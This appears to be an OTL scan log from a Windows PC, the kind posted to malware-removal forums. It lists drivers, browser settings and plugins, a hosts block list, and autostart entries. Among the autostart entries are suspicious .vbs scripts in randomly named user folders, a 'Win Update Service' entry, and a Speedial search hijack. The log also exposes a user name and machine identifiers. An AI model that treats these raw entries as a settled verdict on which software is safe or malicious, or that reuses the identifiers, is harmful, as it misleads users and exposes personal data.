DRV:64bit: - [2009/06/10 15:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 15:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV - [2012/08/01 15:44:04 | 000,014,544 | ---- | M] (OpenLibSys.org) [File_System | On_Demand | Stopped] -- C:\Program Files (x86)\Razer\Razer Game Booster\Driver\WinRing0x64.sys -- (WinRing0_1_2_0)
DRV - [2009/07/13 20:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE:64bit: - HKLM\..\SearchScopes\{31090377-0740-419E-BEFC-A56E50500D5B}: "URL" = http://speedial.com/...=1681320341&ir=
IE:64bit: - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
 
 
IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope =
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope =
 
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope =
 
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = C6 13 FC D9 B8 51 CD 01  [binary data]
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IE10SR
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\..\SearchScopes\{31090377-0740-419E-BEFC-A56E50500D5B}: "URL" = http://speedial.com/...=1681320341&ir=
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...1I7ADFA_enUS490
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:29.0.1
FF - prefs.js..network.proxy.type: 0
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_214.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.11.2: C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.11.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@wacom.com/wtPlugin,version=2.1.0.2: C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1211151.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.7.2: C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@mcafee.com/McAfeeMssPlugin: C:\Program Files\McAfee Security Scan\3.8.130\npMcAfeeMss.dll (McAfee, Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3503.0728: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@wacom.com/wtPlugin,version=2.1.0.2: C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\COCHRAN\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF - HKCU\Software\MozillaPlugins\wacom.com/WacomTabletPlugin: C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\[email protected]: C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2013/01/05 23:55:35 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013/05/24 08:43:13 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2013/01/05 23:55:35 | 000,000,000 | ---D | M]
 
[2012/07/01 21:11:37 | 000,000,000 | ---D | M] (No name found) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\Extensions
[2014/06/14 17:39:51 | 000,000,000 | ---D | M] (No name found) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\Firefox\Profiles\5afpu397.default\extensions
[2012/11/21 12:43:22 | 000,000,000 | ---D | M] (blekko search bar) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\Firefox\Profiles\5afpu397.default\extensions\{636a1cf4-2af8-462e-ba54-5f0d75ad6eef}
[2014/06/08 20:37:15 | 000,000,000 | ---D | M] ("Speedial") -- C:\Users\COCHRAN\AppData\Roaming\mozilla\Firefox\Profiles\5afpu397.default\extensions\{fa95f577-07cb-4470-ac90-e843f5f83c52}
[2014/04/17 11:32:20 | 000,111,249 | ---- | M] () (No name found) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\firefox\profiles\5afpu397.default\extensions\[email protected]
[2014/06/14 17:39:51 | 000,967,387 | ---- | M] () (No name found) -- C:\Users\COCHRAN\AppData\Roaming\mozilla\firefox\profiles\5afpu397.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2014/06/08 20:37:23 | 000,002,771 | ---- | M] () -- C:\Users\COCHRAN\AppData\Roaming\mozilla\firefox\profiles\5afpu397.default\searchplugins\Speedial.xml
[2014/06/12 22:04:35 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2014/04/20 01:10:08 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/05/11 22:26:59 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - default_search_provider: Speedial (Enabled)
CHR - default_search_provider: search_url = http://speedial.com/...=1681320341&ir=
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms},
CHR - plugin: First user (Enabled) = C:\Windows\SysWOW64\npDeployJava1.dll
CHR - plugin: Error reading preferences file
CHR - Extension: Google Drive = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_1\
CHR - Extension: Google Voice Search Hotword (Beta) = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\
CHR - Extension: Google Wallet = C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
 
O1 HOSTS File: ([2013/06/17 11:49:36 | 000,449,637 | R--- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1    www.007guard.com
O1 - Hosts: 127.0.0.1    007guard.com
O1 - Hosts: 127.0.0.1    008i.com
O1 - Hosts: 127.0.0.1    www.008k.com
O1 - Hosts: 127.0.0.1    008k.com
O1 - Hosts: 127.0.0.1    www.00hq.com
O1 - Hosts: 127.0.0.1    00hq.com
O1 - Hosts: 127.0.0.1    010402.com
O1 - Hosts: 127.0.0.1    www.032439.com
O1 - Hosts: 127.0.0.1    032439.com
O1 - Hosts: 127.0.0.1    www.0scan.com
O1 - Hosts: 127.0.0.1    0scan.com
O1 - Hosts: 127.0.0.1    www.1000gratisproben.com
O1 - Hosts: 127.0.0.1    1000gratisproben.com
O1 - Hosts: 127.0.0.1    1001namen.com
O1 - Hosts: 127.0.0.1    www.1001namen.com
O1 - Hosts: 127.0.0.1    100888290cs.com
O1 - Hosts: 127.0.0.1    www.100888290cs.com
O1 - Hosts: 127.0.0.1    www.100sexlinks.com
O1 - Hosts: 127.0.0.1    100sexlinks.com
O1 - Hosts: 127.0.0.1    www.10sek.com
O1 - Hosts: 127.0.0.1    10sek.com
O1 - Hosts: 127.0.0.1    www.1-2005-search.com
O1 - Hosts: 127.0.0.1    1-2005-search.com
O1 - Hosts: 127.0.0.1    www.123fporn.info
O1 - Hosts: 15435 more lines...
O2:64bit: - BHO: (AVG Do Not Track) - {31332EEF-CB9F-458F-AFEB-D30E9A66B6BA} - C:\Program Files (x86)\AVG\AVG2012\avgdtiea.dll File not found
O2:64bit: - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (Google Toolbar Helper) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O2:64bit: - BHO: (Skype add-on for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2:64bit: - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (PowerInbox) - {EF7AED5F-0C26-4820-A570-7DA8B6D93F4A} - C:\Program Files (x86)\PowerInbox\PowerInbox\PowerInboxBHO64.dll (PowerInbox Inc.)
O2 - BHO: (MSS+ Identifier) - {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} - C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll (McAfee, Inc.)
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files (x86)\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O2 - BHO: (Skype Browser Helper) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (PowerInbox) - {EF7AED5F-0C26-4820-A570-7DA8B6D93F4A} - C:\Program Files (x86)\PowerInbox\PowerInbox\PowerInboxBHO.dll (PowerInbox Inc.)
O3:64bit: - HKLM\..\Toolbar: (Google Toolbar) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O3:64bit: - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\..\Toolbar\WebBrowser: (Google Toolbar) - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O4:64bit: - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:64bit: - HKLM..\Run: [Logitech Download Assistant] C:\Windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:64bit: - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4 - HKLM..\Run: [AdobeCS6ServiceManager] C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [AVG_UI] C:\Program Files (x86)\AVG\AVG2014\avgui.exe (AVG Technologies CZ, s.r.o.)
O4 - HKLM..\Run: [BambooCore] C:\Program Files (x86)\Bamboo Dock\BambooCore.exe ()
O4 - HKLM..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe (VIA)
O4 - HKLM..\Run: [InstaLAN] C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinRouterMonitor.exe (Affinegy, Inc.)
O4 - HKLM..\Run: [LifeCam] C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe (Microsoft Corporation)
O4 - HKLM..\Run: [PureLeads Tray] C:\Program Files (x86)\PureLeads\PureLeadsTray.exe (PureLeads)
O4 - HKLM..\Run: [PWRISOVM.EXE] C:\Program Files\PowerISO\PWRISOVM.EXE (Power Software Ltd)
O4 - HKLM..\Run: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe (Adobe Systems Incorporated)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [ApplePhotoStreams] C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe (Apple Inc.)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [Desura] C:\Program Files (x86)\Desura\desura.exe (Desura Pty Ltd)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [GoogleDriveSync] C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [iCloudServices] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (Apple Inc.)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [SpybotSD TeaTimer] C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [Steam] C:\Program Files (x86)\Steam\Steam.exe (Valve Corporation)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [uTorrent] C:\Users\COCHRAN\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [Weather] C:\Program Files (x86)\AWS\WeatherBug\Weather.exe (AWS Convergence Technologies, Inc.)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\Run: [Win Update Service] C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe (Microsoft Corporation)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\RunOnce: [2v57a52ep7] C:\Users\COCHRAN\2v57a52ep7\74727.vbs ()
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\RunOnce: [d5g5rz7tw8n] C:\Users\COCHRAN\d5g5rz7tw8n\13763.vbs ()
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\RunOnce: [FlashPlayerUpdate] C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_13_0_0_214_Plugin.exe (Adobe Systems Incorporated)
O4 - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000..\RunOnce: [kr2759867s7] C:\Users\COCHRAN\kr2759867s7\99489.vbs ()
O4 - Startup: C:\Users\COCHRAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.lnk = C:\Users\COCHRAN\kr2759867s7\99489.vbs ()
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Activities present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O9:64bit: - Extra Button: AVG Do Not Track - {68BCFFE1-A2DA-4B40-9068-87ECBFC19D16} - C:\Program Files (x86)\AVG\AVG2012\avgdtiea.dll File not found
O9:64bit: - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files (x86)\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000007 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 208.68.68.2 208.68.71.209
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C5C5E002-1F32-4BE6-B678-97D7840F66E6}: DhcpNameServer = 208.68.68.2 208.68.71.209
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C6B0776A-746E-42ED-9893-5B8E2C1F22A1}: NameServer = 8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{CB083945-1B1E-457A-A9E5-8ADF752F9E62}: DhcpNameServer = 192.168.2.1
O18:64bit: - Protocol\Handler\linkscanner {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgppa.dll File not found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\linkscanner - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2014/06/15 12:59:41 | 000,004,167 | ---- | M] () - C:\autoupdate.log -- [ NTFS ]
O33 - MountPoints2\{1db441a4-bb9f-11e1-8d90-806e6f6e6963}\Shell - "" = AutoRun
O33 - MountPoints2\{1db441a4-bb9f-11e1-8d90-806e6f6e6963}\Shell\AutoRun\command - "" = D:\Autorun.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O34 - HKLM BootExecute: (/sync /restart)
O34 - HKLM BootExecute: (/sync /restart)
O34 - HKLM BootExecute: (/sync /restart)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/06/15 03:08:01 | 000,000,000 | ---D | C] -- C:\Windows\Migration
[2014/06/15 03:06:32 | 000,028,368 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\IEUDINIT.EXE
[2014/06/15 03:04:11 | 000,940,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MsSpellCheckingFacility.exe
[2014/06/15 03:04:11 | 000,194,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\elshyph.dll
[2014/06/15 03:04:07 | 000,645,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jsIntl.dll
[2014/06/15 03:04:07 | 000,235,008 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\elshyph.dll
[2014/06/15 03:04:07 | 000,071,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\RegisterIEPKEYs.exe
[2014/06/15 03:04:06 | 000,440,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll
[2014/06/15 03:04:06 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll
[2014/06/15 03:04:06 | 000,034,816 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
[2014/06/15 03:04:05 | 001,926,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2014/06/15 03:04:05 | 000,703,488 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll
[2014/06/15 03:04:05 | 000,616,104 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dat
[2014/06/15 03:04:05 | 000,337,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\html.iec
[2014/06/15 03:04:05 | 000,233,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\url.dll
[2014/06/15 03:04:05 | 000,069,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\icardie.dll
[2014/06/15 03:04:05 | 000,062,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\tdc.ocx
[2014/06/15 03:04:05 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll
[2014/06/15 03:04:05 | 000,024,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\licmgr10.dll
[2014/06/15 03:04:04 | 001,051,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll
[2014/06/15 03:04:04 | 000,151,552 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iexpress.exe
[2014/06/15 03:04:04 | 000,139,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wextract.exe
[2014/06/15 03:04:04 | 000,083,456 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inseng.dll
[2014/06/15 03:04:04 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/06/15 03:04:04 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll
[2014/06/15 03:04:04 | 000,056,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\pngfilt.dll
[2014/06/15 03:04:03 | 000,610,304 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript.dll
[2014/06/15 03:04:03 | 000,127,488 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\occache.dll
[2014/06/15 03:04:03 | 000,116,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iepeers.dll
[2014/06/15 03:04:03 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe
[2014/06/15 03:04:03 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\IEAdvpack.dll
[2014/06/15 03:04:03 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll
